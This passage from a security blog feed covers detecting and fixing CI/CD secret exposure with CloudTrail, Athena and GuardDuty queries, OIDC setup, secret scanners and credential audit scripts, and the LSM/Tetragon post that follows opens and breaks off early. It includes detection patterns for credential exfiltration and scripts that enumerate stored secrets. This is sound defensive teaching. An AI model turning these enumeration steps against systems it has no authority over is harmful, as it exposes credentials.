</code></pre>
<hr />
<h2 id="blue-phase-detection-across-the-secret-lifecycle">Blue Phase: Detection Across the Secret Lifecycle</h2>
<h3 id="github-secret-scanning-alerts">GitHub Secret Scanning Alerts</h3>
<pre><code class="" data-line=""># List secret scanning alerts in a repository via GitHub API
curl -H &quot;Authorization: Bearer ${GITHUB_TOKEN}&quot; \
  -H &quot;Accept: application/vnd.github+json&quot; \
  &quot;https://api.github.com/repos/your-org/your-repo/secret-scanning/alerts?state=open&quot; | \
  jq &#039;.[] | {
    type: .secret_type,
    state: .state,
    created: .created_at,
    url: .html_url
  }&#039;
</code></pre>
<h3 id="cloudtrail-detecting-api-activity-from-cicd-credentials">CloudTrail: Detecting API Activity from CI/CD Credentials</h3>
<p>When a CI/CD credential is used by an attacker, the CloudTrail events show unusual patterns:</p>
<pre><code class="" data-line=""># Find API calls from CI/CD credentials outside normal working hours
# or from unexpected IPs (attacker using the stolen key)
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=Username,AttributeValue=ci-deploy-user \
  --start-time &quot;$(date -d &#039;7 days ago&#039; --iso-8601=seconds)&quot; \
  --query &#039;Events[].{Time:EventTime,Name:EventName,IP:CloudTrailEvent}&#039; \
  --output json | \
  jq &#039;.[] | {
    time: .Time,
    event: .Name,
    ip: (.IP | fromjson | .sourceIPAddress),
    user_agent: (.IP | fromjson | .userAgent)
  }&#039; | \
  jq &#039;select(.ip | test(&quot;^(10\\.|172\\.(1[6-9]|2[0-9]|3[01])\\.|192\\.168\\.)&quot;) | not)&#039;
  # Filter: events from non-RFC1918 IPs (outside your known CI/CD IP ranges)
</code></pre>
<h3 id="siem-query-credential-used-in-multiple-regions-simultaneously">SIEM Query: Credential Used in Multiple Regions Simultaneously</h3>
<p>A credential being used from multiple regions simultaneously is a strong indicator of compromise:</p>
<pre><code class="" data-line="">-- Athena query against CloudTrail logs
-- Detect: same access key used from more than two regions within the same hour
SELECT
  userIdentity.accessKeyId,
  userIdentity.userName,
  COUNT(DISTINCT awsRegion) as region_count,
  ARRAY_AGG(DISTINCT awsRegion) as regions,
  COUNT(DISTINCT sourceIPAddress) as ip_count,
  ARRAY_AGG(DISTINCT sourceIPAddress) as source_ips,
  DATE_TRUNC(&#039;hour&#039;, from_iso8601_timestamp(eventTime)) as hour
FROM cloudtrail_logs
WHERE
  userIdentity.type = &#039;IAMUser&#039;
  AND from_iso8601_timestamp(eventTime) &gt; current_timestamp - interval &#039;7&#039; day
GROUP BY
  userIdentity.accessKeyId,
  userIdentity.userName,
  DATE_TRUNC(&#039;hour&#039;, from_iso8601_timestamp(eventTime))
HAVING COUNT(DISTINCT awsRegion) &gt; 2
ORDER BY region_count DESC;
</code></pre>
<h3 id="guardduty-credential-exfiltration-indicators">GuardDuty: Credential Exfiltration Indicators</h3>
<pre><code class="" data-line=""># GuardDuty findings relevant to CI/CD credential compromise
DETECTOR_ID=$(aws guardduty list-detectors --query &#039;DetectorIds[0]&#039; --output text)

aws guardduty list-findings \
  --detector-id &quot;${DETECTOR_ID}&quot; \
  --finding-criteria &#039;{
    &quot;Criterion&quot;: {
      &quot;type&quot;: {
        &quot;Equals&quot;: [
          &quot;UnauthorizedAccess:IAMUser/TorIPCaller&quot;,
          &quot;UnauthorizedAccess:IAMUser/MaliciousIPCaller&quot;,
          &quot;Discovery:IAMUser/AnomalousBehavior&quot;,
          &quot;Exfiltration:IAMUser/AnomalousBehavior&quot;,
          &quot;CredentialAccess:IAMUser/AnomalousBehavior&quot;
        ]
      }
    }
  }&#039; \
  --query &#039;FindingIds&#039; --output text | \
  xargs -n 10 aws guardduty get-findings \
    --detector-id &quot;${DETECTOR_ID}&quot; \
    --finding-ids | \
  jq &#039;.Findings[] | {type: .Type, user: .Resource.AccessKeyDetails.UserName, severity: .Severity}&#039;
</code></pre>
<hr />
<h2 id="purple-phase-the-structural-fix">Purple Phase: The Structural Fix</h2>
<h3 id="fix-1-oidc-workload-identity-eliminate-stored-credentials">Fix 1: OIDC Workload Identity — Eliminate Stored Credentials</h3>
<p>This is the structural solution. Instead of storing an AWS IAM access key in your CI/CD platform, the CI/CD job authenticates to AWS using an OIDC token issued by the CI/CD provider. AWS validates the token against a pre-configured trust policy and issues temporary credentials valid for the duration of the job.</p>
<p>The <a href="https://linuxcent.com/oidc-workload-identity-eliminate-cloud-access-keys/">OIDC workload identity approach eliminates static cloud access keys</a> entirely — there is no secret to commit, no secret to exfiltrate from the CI/CD platform, and no long-lived credential to rotate on breach.</p>
<p><strong>GitHub Actions with AWS OIDC — complete setup:</strong></p>
<pre><code class="" data-line=""># .github/workflows/deploy.yml
name: Deploy to AWS

on:
  push:
    branches: [main]

permissions:
  id-token: write   # Required for OIDC token request
  contents: read

jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4

      - name: Configure AWS credentials via OIDC
        uses: aws-actions/configure-aws-credentials@v4
        with:
          role-to-assume: arn:aws:iam::123456789012:role/github-actions-deploy-role
          role-session-name: github-actions-${{ github.run_id }}
          aws-region: us-east-1
          # No AWS_ACCESS_KEY_ID or AWS_SECRET_ACCESS_KEY needed

      - name: Deploy
        run: aws s3 sync ./dist s3://your-bucket/
</code></pre>
<p><strong>AWS IAM trust policy for GitHub Actions OIDC:</strong></p>
<pre><code class="" data-line="">{
  &quot;Version&quot;: &quot;2012-10-17&quot;,
  &quot;Statement&quot;: [
    {
      &quot;Effect&quot;: &quot;Allow&quot;,
      &quot;Principal&quot;: {
        &quot;Federated&quot;: &quot;arn:aws:iam::123456789012:oidc-provider/token.actions.githubusercontent.com&quot;
      },
      &quot;Action&quot;: &quot;sts:AssumeRoleWithWebIdentity&quot;,
      &quot;Condition&quot;: {
        &quot;StringEquals&quot;: {
          &quot;token.actions.githubusercontent.com:aud&quot;: &quot;sts.amazonaws.com&quot;
        },
        &quot;StringLike&quot;: {
          &quot;token.actions.githubusercontent.com:sub&quot;: &quot;repo:your-org/your-repo:ref:refs/heads/main&quot;
        }
      }
    }
  ]
}
</code></pre>
<pre><code class="" data-line=""># Create the OIDC provider in AWS (one-time setup)
aws iam create-open-id-connect-provider \
  --url https://token.actions.githubusercontent.com \
  --client-id-list sts.amazonaws.com \
  --thumbprint-list &quot;6938fd4d98bab03faadb97b34396831e3780aea1&quot;

# Create the IAM role with the trust policy above
aws iam create-role \
  --role-name github-actions-deploy-role \
  --assume-role-policy-document file://github-actions-trust-policy.json

# Attach a least-privilege policy to the role
aws iam attach-role-policy \
  --role-name github-actions-deploy-role \
  --policy-arn arn:aws:iam::123456789012:policy/deploy-policy
</code></pre>
<h3 id="fix-2-pre-commit-hooks-catch-accidents-before-they-reach-vcs">Fix 2: Pre-Commit Hooks — Catch Accidents Before They Reach VCS</h3>
<p>Pre-commit hooks don&#8217;t stop a determined attacker. They catch accidents — the developer who forgets to add a <code class="" data-line="">.env</code> file to <code class="" data-line="">.gitignore</code> before staging all files.</p>
<pre><code class="" data-line=""># Install pre-commit framework
pip install pre-commit

# .pre-commit-config.yaml in your repository root
cat &gt; .pre-commit-config.yaml &lt;&lt; &#039;EOF&#039;
repos:
  - repo: https://github.com/gitleaks/gitleaks
    rev: v8.18.4
    hooks:
      - id: gitleaks
        name: Detect hardcoded secrets
        entry: gitleaks protect --staged --redact --verbose
        language: golang
        pass_filenames: false

  - repo: https://github.com/pre-commit/pre-commit-hooks
    rev: v4.5.0
    hooks:
      - id: detect-private-key
      - id: check-added-large-files
        args: [&#039;--maxkb=1000&#039;]
EOF

# Install the hooks in the local repository
pre-commit install

# Run the hooks once against every file in the repository to verify the setup
pre-commit run --all-files
</code></pre>
<h3 id="fix-3-ci-layer-secret-scanning-block-before-merge">Fix 3: CI-Layer Secret Scanning — Block Before Merge</h3>
<pre><code class="" data-line=""># GitHub Actions: secret scanning as a required status check
# .github/workflows/secret-scan.yml
name: Secret Scan

on:
  pull_request:
    types: [opened, synchronize]

jobs:
  secret-scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0  # Full history for git log scanning

      - name: Run TruffleHog
        uses: trufflesecurity/trufflehog@main  # In production, pin to a full commit SHA instead of @main
        with:
          path: ./
          base: ${{ github.event.repository.default_branch }}
          head: HEAD
          extra_args: --only-verified --json
</code></pre>
<pre><code class="" data-line=""># GitLab CI: secret detection built-in template
include:
  - template: Security/Secret-Detection.gitlab-ci.yml

secret_detection:
  stage: test
  variables:
    SECRET_DETECTION_HISTORIC_SCAN: &quot;true&quot;  # Scan full history
</code></pre>
<h3 id="fix-4-audit-and-rotate-existing-cicd-platform-secrets">Fix 4: Audit and Rotate Existing CI/CD Platform Secrets</h3>
<p>After implementing OIDC, inventory the credentials that are still stored and migrate them. This script lists every active IAM access key and when it was last used:</p>
<pre><code class="" data-line="">#!/bin/bash
# Purple Team EP06 — CI/CD Secrets Migration Audit
# Identifies AWS IAM keys stored in CI/CD that should be replaced with OIDC

echo &quot;=== AWS IAM Keys Potentially Stored in CI/CD ===&quot;
echo &quot;--- Active access keys per user, with last-used date and service ---&quot;

# Get all IAM access keys
aws iam list-users --query &#039;Users[].UserName&#039; --output text | tr &#039;\t&#039; &#039;\n&#039; | \
  while read user; do
    keys=$(aws iam list-access-keys --user-name &quot;$user&quot; \
      --query &#039;AccessKeyMetadata[?Status==`Active`].{Key:AccessKeyId,Created:CreateDate}&#039; \
      --output json)

    if [ &quot;$(echo &quot;$keys&quot; | jq length)&quot; -gt 0 ]; then
      echo &quot;&quot;
      echo &quot;User: $user&quot;
      echo &quot;$keys&quot; | jq -r &#039;.[] | &quot;  Key: &quot; + .Key + &quot; | Created: &quot; + .Created&#039;

      # Check last used
      echo &quot;$keys&quot; | jq -r &#039;.[].Key&#039; | while read key_id; do
        last_used=$(aws iam get-access-key-last-used --access-key-id &quot;$key_id&quot; \
          --query &#039;AccessKeyLastUsed.{Date:LastUsedDate,Service:ServiceName,Region:Region}&#039; \
          --output json)
        echo &quot;  Last used: $(echo &quot;$last_used&quot; | jq -r &#039;.Date // &quot;Never&quot;&#039;) | Service: $(echo &quot;$last_used&quot; | jq -r &#039;.Service // &quot;N/A&quot;&#039;)&quot;
      done
    fi
  done

echo &quot;&quot;
echo &quot;=== MIGRATION CHECKLIST ===&quot;
echo &quot;  1. For each CI/CD IAM key above:&quot;
echo &quot;     a. Identify which CI/CD platform uses it&quot;
echo &quot;     b. Set up OIDC trust policy for that platform&quot;
echo &quot;     c. Update pipeline to use OIDC (no stored key)&quot;
echo &quot;     d. Disable the IAM key and verify pipelines still work&quot;
echo &quot;     e. Delete the IAM key once nothing depends on it&quot;
</code></pre>
<hr />
<h2 id="run-this-in-your-own-environment-secrets-exposure-audit">Run This in Your Own Environment: Secrets Exposure Audit</h2>
<pre><code class="" data-line="">#!/bin/bash
# Purple Team EP06 — CI/CD Secrets Exposure Audit
# Run from your workstation with git and trufflehog installed

echo &quot;=== 1. Scan Local Repository for Committed Secrets ===&quot;
if command -v trufflehog &gt; /dev/null 2&gt;&amp;1; then
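  findings=$(trufflehog git &quot;file://$(pwd)&quot; --only-verified --json 2&gt;/dev/null | \
    jq &#039;{file: .SourceMetadata.Data.Git.file, detector: .DetectorName}&#039;)
  # jq exits 0 on empty input, so test the captured output rather than the exit status
  if [ -n &quot;$findings&quot; ]; then
    echo &quot;$findings&quot;
  else
    echo &quot;  No verified secrets found in git history&quot;
  fi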
else
  echo &quot;  Install trufflehog: brew install trufflehog (or see github.com/trufflesecurity/trufflehog)&quot;
fi

echo &quot;&quot;
echo &quot;=== 2. Check for .env Files in Git History ===&quot;
git log --all --full-history -- &quot;*.env&quot; &quot;**/.env&quot; &quot;.env.*&quot; 2&gt;/dev/null | \
  grep &quot;^commit&quot; | head -5 | \
  while read _ commit; do
    echo &quot;  .env file committed: $commit&quot;
    git show &quot;$commit&quot; --stat | head -3
  done

echo &quot;&quot;
echo &quot;=== 3. Check Running Pods for Credential Env Vars (Kubernetes) ===&quot;
if command -v kubectl &gt; /dev/null 2&gt;&amp;1; then
  kubectl get pods -A -o json 2&gt;/dev/null | \
    jq -r &#039;.items[] | 
      .metadata.namespace + &quot;/&quot; + .metadata.name + &quot;: &quot; + 
      ([.spec.containers[].env[]? | 
        select(.name | test(&quot;KEY|SECRET|TOKEN|PASSWORD|CREDENTIAL&quot;; &quot;i&quot;)) |
        .name
      ] | join(&quot;, &quot;))&#039; | \
    grep -v &quot;: $&quot; | head -20
else
  echo &quot;  kubectl not found&quot;
fi

echo &quot;&quot;
echo &quot;=== 4. GitHub Actions Secrets Inventory ===&quot;
if [ -n &quot;${GITHUB_TOKEN}&quot; ]; then
  REPO=&quot;your-org/your-repo&quot;  # Update this
  curl -s -H &quot;Authorization: Bearer ${GITHUB_TOKEN}&quot; \
    -H &quot;Accept: application/vnd.github+json&quot; \
    &quot;https://api.github.com/repos/${REPO}/actions/secrets&quot; | \
    jq &#039;.secrets[] | {name: .name, updated: .updated_at}&#039;
else
  echo &quot;  Set GITHUB_TOKEN to enumerate repository secrets&quot;
fi
</code></pre>
<hr />
<h2 id="common-mistakes-when-addressing-cicd-secrets-exposure"><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/26a0.png" alt="⚠" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Common Mistakes When Addressing CI/CD Secrets Exposure</h2>
<p><strong>Treating secret scanning as the primary control.</strong> TruffleHog and Gitleaks catch what gets committed. They do not prevent the CircleCI attack class — an attacker who compromises the CI/CD platform itself bypasses all scanning controls. Scanning is detection; OIDC workload identity is prevention.</p>
<p><strong>Rotating compromised keys without checking CloudTrail for use.</strong> When a secret is exposed, the first question is not &#8220;rotate it&#8221; — it is &#8220;was it used?&#8221; Check CloudTrail for any API activity from the key between the suspected exposure time and the rotation. If the key was used, you have an active incident, not just a credential rotation task.</p>
<p><strong>Using OIDC trust policies that are too broad.</strong> The GitHub Actions OIDC trust policy in the fix section uses a <code class="" data-line="">StringLike</code> condition on the <code class="" data-line="">sub</code> claim to scope to a specific repository and branch. If you use <code class="" data-line="">StringLike: &quot;*&quot;</code> instead, any GitHub Actions job in any repository can assume your role. Always scope OIDC trust policies to the specific repository, branch, and environment that needs the access.</p>
<p><strong>Not scanning git history — only the working tree.</strong> Secrets that were committed and then deleted are still in git history. <code class="" data-line="">git rm</code> removes the file from the working tree but not from the object store. TruffleHog&#8217;s <code class="" data-line="">git</code> mode and <code class="" data-line="">gitleaks detect</code> walk commit history; add <code class="" data-line="">--log-opts=&quot;--all&quot;</code> to Gitleaks to cover every branch and ref, not just the current one. Scanning only the current working tree misses all historical exposures.</p>
<p><strong>Forgetting third-party GitHub Actions.</strong> The supply chain attack surface includes the Actions you reference in your workflows. An Action pinned to a mutable tag (<code class="" data-line="">@main</code>, <code class="" data-line="">@v1</code>) can be changed by the maintainer. Pin to a specific commit SHA and verify the Action&#8217;s provenance.</p>
<pre><code class="" data-line=""># Vulnerable: mutable tag
- uses: aws-actions/configure-aws-credentials@v4

# Secure: pinned SHA
- uses: aws-actions/configure-aws-credentials@e3dd6a429d7300a6a4c196c26e831c1e4c763fe4
</code></pre>
<hr />
<h2 id="quick-reference">Quick Reference</h2>
<table>
<thead>
<tr>
<th>Secret Storage Pattern</th>
<th>Risk Level</th>
<th>Structural Fix</th>
</tr>
</thead>
<tbody>
<tr>
<td>.env file committed to public repo</td>
<td>Critical</td>
<td>Pre-commit hook + OIDC</td>
</tr>
<tr>
<td>.env file committed to private repo</td>
<td>High</td>
<td>Git history purge + pre-commit hook + OIDC</td>
</tr>
<tr>
<td>Long-lived key in CI/CD env var</td>
<td>High</td>
<td>OIDC workload identity</td>
</tr>
<tr>
<td>Long-lived key in K8s Secret</td>
<td>High</td>
<td>Pod identity / IRSA / Workload Identity</td>
</tr>
<tr>
<td>Secret in build log output</td>
<td>Medium</td>
<td>Mask secrets in CI configuration</td>
</tr>
<tr>
<td>Secret in container env var</td>
<td>Medium</td>
<td>Vault agent / CSI secrets driver</td>
</tr>
<tr>
<td>Key referenced via AWS Secrets Manager</td>
<td>Low (if scoped)</td>
<td>Use for remaining static secrets</td>
</tr>
</tbody>
</table>
<hr />
<h2 id="key-takeaways">Key Takeaways</h2>
<ul>
<li><strong>CI/CD secrets exposure</strong> is structural: long-lived credentials in a CI/CD platform are only as secure as that platform — the CircleCI breach proved that encryption alone is insufficient if the attacker can access the keys</li>
<li>Automated secret scanners find publicly committed credentials within 60–90 seconds — rotation must happen faster than that or assume compromise</li>
<li>Pre-commit hooks and CI secret scanning catch accidents; they do not prevent determined attackers who compromise the platform itself</li>
<li><a href="https://linuxcent.com/oidc-workload-identity-eliminate-cloud-access-keys/">OIDC workload identity</a> is the structural fix: no stored credential means no credential to exfiltrate</li>
<li>When rotating a compromised key, check CloudTrail for usage between exposure and rotation before closing the incident</li>
<li>OIDC trust policies must be scoped to specific repositories and branches — a wildcard trust policy recreates the exposure in a different form</li>
<li>Pin third-party GitHub Actions to commit SHAs, not mutable tags — mutable tags are a supply chain attack surface</li>
</ul>
<hr />
<h2 id="whats-next">What&#8217;s Next</h2>
<p>EP07 covers SSRF to cloud metadata: how an SSRF vulnerability in any application layer becomes a straight line to IAM credentials when IMDSv2 is not enforced. The Capital One breach anatomy — WAF SSRF → EC2 metadata → IAM role credentials → 100 million S3 records — in full technical detail, with the simulation commands and the one-line enforcement fix. If you&#8217;ve addressed identity and secrets, the network attack paths are where EP07 through EP10 focus.</p>
<p>Get EP07 in your inbox when it publishes → <a href="https://linuxcent.com/cicd-secrets-exposure-supply-chain/#subscribe">subscribe at linuxcent.com</a></p>
<p><a class="a2a_button_mastodon" href="https://www.addtoany.com/add_to/mastodon?linkurl=https%3A%2F%2Flinuxcent.com%2Fcicd-secrets-exposure-supply-chain%2F&amp;linkname=CI%2FCD%20Secrets%20Exposure%3A%20How%20Supply%20Chain%20Attacks%20Target%20Your%20Pipeline" title="Mastodon" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Flinuxcent.com%2Fcicd-secrets-exposure-supply-chain%2F&amp;linkname=CI%2FCD%20Secrets%20Exposure%3A%20How%20Supply%20Chain%20Attacks%20Target%20Your%20Pipeline" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Flinuxcent.com%2Fcicd-secrets-exposure-supply-chain%2F&amp;linkname=CI%2FCD%20Secrets%20Exposure%3A%20How%20Supply%20Chain%20Attacks%20Target%20Your%20Pipeline" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Flinuxcent.com%2Fcicd-secrets-exposure-supply-chain%2F&amp;linkname=CI%2FCD%20Secrets%20Exposure%3A%20How%20Supply%20Chain%20Attacks%20Target%20Your%20Pipeline" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Flinuxcent.com%2Fcicd-secrets-exposure-supply-chain%2F&amp;linkname=CI%2FCD%20Secrets%20Exposure%3A%20How%20Supply%20Chain%20Attacks%20Target%20Your%20Pipeline" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Flinuxcent.com%2Fcicd-secrets-exposure-supply-chain%2F&amp;linkname=CI%2FCD%20Secrets%20Exposure%3A%20How%20Supply%20Chain%20Attacks%20Target%20Your%20Pipeline" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_copy_link" 
href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Flinuxcent.com%2Fcicd-secrets-exposure-supply-chain%2F&amp;linkname=CI%2FCD%20Secrets%20Exposure%3A%20How%20Supply%20Chain%20Attacks%20Target%20Your%20Pipeline" title="Copy Link" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share#url=https%3A%2F%2Flinuxcent.com%2Fcicd-secrets-exposure-supply-chain%2F&#038;title=CI%2FCD%20Secrets%20Exposure%3A%20How%20Supply%20Chain%20Attacks%20Target%20Your%20Pipeline" data-a2a-url="https://linuxcent.com/cicd-secrets-exposure-supply-chain/" data-a2a-title="CI/CD Secrets Exposure: How Supply Chain Attacks Target Your Pipeline"></a></p><p>The post <a href="https://linuxcent.com/cicd-secrets-exposure-supply-chain/">CI/CD Secrets Exposure: How Supply Chain Attacks Target Your Pipeline</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://linuxcent.com/cicd-secrets-exposure-supply-chain/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1858</post-id>	</item>
		<item>
		<title>LSM and Tetragon — When the Kernel Says No</title>
		<link>https://linuxcent.com/ebpf-lsm-tetragon-runtime-security/</link>
					<comments>https://linuxcent.com/ebpf-lsm-tetragon-runtime-security/#respond</comments>
		
		<dc:creator><![CDATA[Vamshi Krishna Santhapuri]]></dc:creator>
		<pubDate>Fri, 12 Jun 2026 02:00:00 +0000</pubDate>
				<category><![CDATA[eBPF]]></category>
		<category><![CDATA[Cilium]]></category>
		<category><![CDATA[Kubernetes]]></category>
		<category><![CDATA[linux-security]]></category>
		<category><![CDATA[LSM]]></category>
		<category><![CDATA[Runtime Security]]></category>
		<category><![CDATA[SRE]]></category>
		<category><![CDATA[Tetragon]]></category>
		<guid isPermaLink="false">https://linuxcent.com/?p=1841</guid>

					<description><![CDATA[<p><span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 9</span> <span class="rt-label rt-postfix">minutes</span></span>LSM hooks with eBPF enforce security policy at the syscall boundary before the operation completes. How Tetragon kills processes from kernel space and why that difference matters.</p>
<p>The post <a href="https://linuxcent.com/ebpf-lsm-tetragon-runtime-security/">LSM and Tetragon — When the Kernel Says No</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></description>
										<content:encoded><![CDATA[<span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 9</span> <span class="rt-label rt-postfix">minutes</span></span><style>
pre{position:relative;background:#1e1e1e;color:#d4d4d4;
    padding:16px 16px 16px 20px;border-radius:6px;overflow-x:auto;
    font-family:'JetBrains Mono','Fira Code','Cascadia Code',Consolas,'Courier New',monospace;
    font-size:.88em;line-height:1.6;border-left:4px solid #555}
code{background:#f4f4f4;padding:2px 5px;border-radius:3px;font-size:.9em}
pre code{background:transparent;padding:0;color:inherit}
pre[data-lang="bash"],pre[data-lang="sh"],
pre[data-lang="shell"],pre[data-lang="zsh"]{border-left-color:#4ec9b0}
pre[data-lang="yaml"],pre[data-lang="json"],
pre[data-lang="toml"],pre[data-lang="xml"]{border-left-color:#569cd6}
pre[data-lang="python"],pre[data-lang="go"],pre[data-lang="rust"],
pre[data-lang="java"],pre[data-lang="c"],pre[data-lang="cpp"]{border-left-color:#c586c0}
pre[data-lang="text"],pre[data-lang="output"],
pre[data-lang="console"]{border-left-color:#888}
.lc-copy-btn{position:absolute;top:8px;right:8px;background:#2d2d2d;color:#ccc;
    border:1px solid #444;border-radius:4px;padding:3px 9px;font-size:.75em;
    font-family:system-ui,sans-serif;cursor:pointer;opacity:0;
    transition:opacity .15s,background .15s;line-height:1.6}
pre:hover .lc-copy-btn{opacity:1}
.lc-copy-btn:hover{background:#3a3a3a;color:#fff}
.lc-copy-btn.copied{color:#4ec9b0;border-color:#4ec9b0}
.lc-lang-badge{position:absolute;top:8px;left:20px;font-family:system-ui,sans-serif;
    font-size:.7em;color:#666;text-transform:uppercase;letter-spacing:.04em;
    line-height:1;pointer-events:none;opacity:0;transition:opacity .15s}
pre:hover .lc-lang-badge{opacity:1}
table{border-collapse:collapse;width:100%;margin:16px 0}
th,td{border:1px solid #ddd;padding:10px 14px;text-align:left}
th{background:#f0f0f0;font-weight:600}
tr:nth-child(even){background:#fafafa}
</style>
<p><script>
(function(){
  // Code-block enhancer: gives every pre element a "Copy" button and, when its
  // code child carries a language-* class, a data-lang attribute plus a badge.
  // The window-level flag keeps the script idempotent when the same snippet is
  // embedded more than once on a page.
  if(window.__lcCodeEnhanced)return;
  window.__lcCodeEnhanced=true;
  // Decorate every pre element currently in the document.
  function enhance(){
    document.querySelectorAll('pre').forEach(function(pre){
      var code=pre.querySelector('code');
      var lang='';
      if(code){var m=(code.className||'').match(/language-(\S+)/);if(m)lang=m[1].toLowerCase();}
      if(lang){
        pre.setAttribute('data-lang',lang);
        var badge=document.createElement('span');badge.className='lc-lang-badge';badge.textContent=lang;
        pre.insertBefore(badge,pre.firstChild);
      }
      var btn=document.createElement('button');
      btn.type='button'; // never behave as a submit button if the pre sits inside a form
      btn.className='lc-copy-btn';btn.textContent='Copy';btn.setAttribute('aria-label','Copy code to clipboard');
      pre.appendChild(btn);
      btn.addEventListener('click',function(){
        // Without a code child the text comes from the pre itself, which also
        // contains the injected button; exclude the button's own label.
        var text=code?code.innerText:textWithout(pre,btn);
        if(navigator.clipboard&&window.isSecureContext){
          navigator.clipboard.writeText(text).then(function(){ok(btn);}).catch(function(){fb(text,btn);});
        }else{fb(text,btn);}
      });
    });
  }
  // Returns host.innerText with el temporarily un-rendered so that el's text is
  // left out; the previous inline display value is always restored.
  function textWithout(host,el){
    var prev=el.style.display;
    el.style.display='none';
    try{return host.innerText;}
    finally{el.style.display=prev;}
  }
  // Success feedback: show "Copied!" for two seconds, then reset the label.
  function ok(btn){btn.textContent='Copied!';btn.classList.add('copied');setTimeout(function(){btn.textContent='Copy';btn.classList.remove('copied');},2000);}
  // Failure feedback: show the failure label for two seconds, then reset it.
  function fail(btn){btn.textContent='✗ Failed';setTimeout(function(){btn.textContent='Copy';},2000);}
  // Fallback copy path for insecure contexts or a rejected Clipboard API call:
  // select the text in an off-screen textarea and run execCommand('copy').
  function fb(text,btn){
    var ta=document.createElement('textarea');
    var copied=false;
    try{
      ta.value=text;
      ta.style.cssText='position:fixed;left:-9999px;top:-9999px;opacity:0';
      document.body.appendChild(ta);
      ta.select();
      // execCommand reports failure by returning false, not by throwing.
      copied=document.execCommand('copy');
    }catch(e){
      copied=false;
    }finally{
      // Remove the helper textarea on every path so it cannot leak into the page.
      if(ta.parentNode)ta.parentNode.removeChild(ta);
    }
    if(copied){ok(btn);}else{fail(btn);}
  }
  if(document.readyState==='loading'){document.addEventListener('DOMContentLoaded',enhance);}else{enhance();}
})();
</script></p>
<p><em>eBPF: From Kernel to Cloud, Episode 12</em><br />
<a href="/what-is-ebpf/">What Is eBPF?</a> · <a href="/ebpf-verifier-safety/">The BPF Verifier</a> · <a href="/ebpf-vs-kernel-modules/">eBPF vs Kernel Modules</a> · <a href="/ebpf-program-types/">eBPF Program Types</a> · <a href="/ebpf-maps-persistent-data/">eBPF Maps</a> · <a href="/co-re-libbpf-write-once/">CO-RE and libbpf</a> · <a href="/xdp-network-fast-path/">XDP</a> · <a href="/tc-ebpf-pod-network-policy/">TC eBPF</a> · <a href="/bpftrace-kernel-observability/">bpftrace</a> · <a href="/network-flow-observability-ebpf/">Network Flow Observability</a> · <a href="/dns-kernel-observability/">DNS Observability</a> · <strong>LSM and Tetragon</strong></p>
<hr />
<p style="font-size:0.72em;font-weight:700;letter-spacing:0.12em;color:#f59e0b;text-transform:uppercase;margin:2em 0 0.75em 0;text-align:center;">Architecture Overview</p>
<figure class="wp-block-image size-full" style="margin:0 0 0.5em 0;">
<img decoding="async" width="2400" height="1578" src="https://linuxcent.com/wp-content/uploads/2026/05/ep12-lsm-tetragon-og-2.png" alt="LSM BPF and Tetragon — kernel security enforcement architecture showing syscall interception and policy evaluation" class="wp-image-2121" style="width:100%;height:auto;display:block;border-radius:8px;" srcset="https://linuxcent.com/wp-content/uploads/2026/05/ep12-lsm-tetragon-og-2.png 2400w, https://linuxcent.com/wp-content/uploads/2026/05/ep12-lsm-tetragon-og-2-300x197.png 300w, https://linuxcent.com/wp-content/uploads/2026/05/ep12-lsm-tetragon-og-2-1024x673.png 1024w, https://linuxcent.com/wp-content/uploads/2026/05/ep12-lsm-tetragon-og-2-768x505.png 768w, https://linuxcent.com/wp-content/uploads/2026/05/ep12-lsm-tetragon-og-2-1536x1010.png 1536w, https://linuxcent.com/wp-content/uploads/2026/05/ep12-lsm-tetragon-og-2-2048x1347.png 2048w" sizes="(max-width: 2400px) 100vw, 2400px" /><figcaption style="text-align:center;font-size:0.85em;color:#6b7280;margin-top:0.75em;">LSM BPF hooks fire before every sensitive syscall — Tetragon uses them to enforce and kill, not just observe.</figcaption></figure>
<hr style="border:none;border-top:1px solid #e5e7eb;margin:0.5em 0 2em 0;"/>
<h2 id="tldr">TL;DR</h2>
<ul>
<li>LSM eBPF Tetragon integrates Linux Security Module hooks with eBPF programs — enforcement happens at the syscall boundary, before the operation completes, with no detect-and-respond window<br />
  <em>(LSM hook = Linux Security Module hook: a callback point built into the kernel that fires before a security-relevant operation completes, allowing the security module to approve or reject it)</em></li>
<li>Falco and similar sidecar-based tools detect after the fact — the syscall returns, the file is written, the connection is established, the alert fires; with LSM, the syscall never returns success</li>
<li><code class="" data-line="">BPF_PROG_TYPE_LSM</code> is the eBPF program type that attaches to LSM hooks — introduced in kernel 5.7, stable in 5.10+; available on all current Ubuntu LTS, Fedora, and EKS/GKE nodes</li>
<li>Tetragon attaches eBPF programs to LSM hooks and kprobes simultaneously — observing and enforcing from the same kernel attachment point</li>
